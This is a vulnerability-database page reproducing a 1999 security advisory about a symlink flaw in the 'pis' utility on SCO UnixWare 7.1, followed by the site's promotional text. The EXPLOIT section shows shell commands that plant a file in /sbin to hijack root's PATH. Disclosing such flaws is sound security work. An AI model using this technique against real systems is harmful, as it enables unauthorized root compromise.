Vulners
Lucene search
unixware.pis.txt
`Greetings,
OVERVIEW
A vulnerability in "/usr/local/bin/pis" on SCO UnixWare will allow any
user to create arbitrary files with group "sys" privileges. A full root
compromise is then trivial.
BACKGROUND
As usual, I've only tested UnixWare 7.1.
DETAILS
By creating a symlink between /tmp/pisdata and any sys-owned file we can
overwrite that file with ps output. If we point the symlink at a
non-existant file in a directory which we can write to (such as, say,
/sbin/ls), pis will create this file mode 666 owned by us, group of sys.
This is a fairly simple compromise. /sbin is writable by group sys. We
can create files in /sbin owned by us. And root's default $PATH starts
with /sbin.
EXPLOIT
bash-2.02$ ls -dal /sbin
drwxrwxr-x 2 root sys 3072 Dec 28 08:18 /sbin
bash-2.02$ ln -s /sbin/xnec /tmp/pisdata
bash-2.02$ pis
<program output>
bash-2.02$ ls -la /sbin/xnec
-rw-rw-rw- 1 xnec sys 5896 Dec 28 08:28 /sbin/xnec
bash-2.02$
Brock Tellier
UNIX Systems Administrator
Chicago, IL, USA
[email protected]
____________________________________________________________________
Get free email and a permanent address at http://www.netaddress.com/?N=1
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Dec 1999 00:00Current
0.2Low risk
Vulners AI Score0.2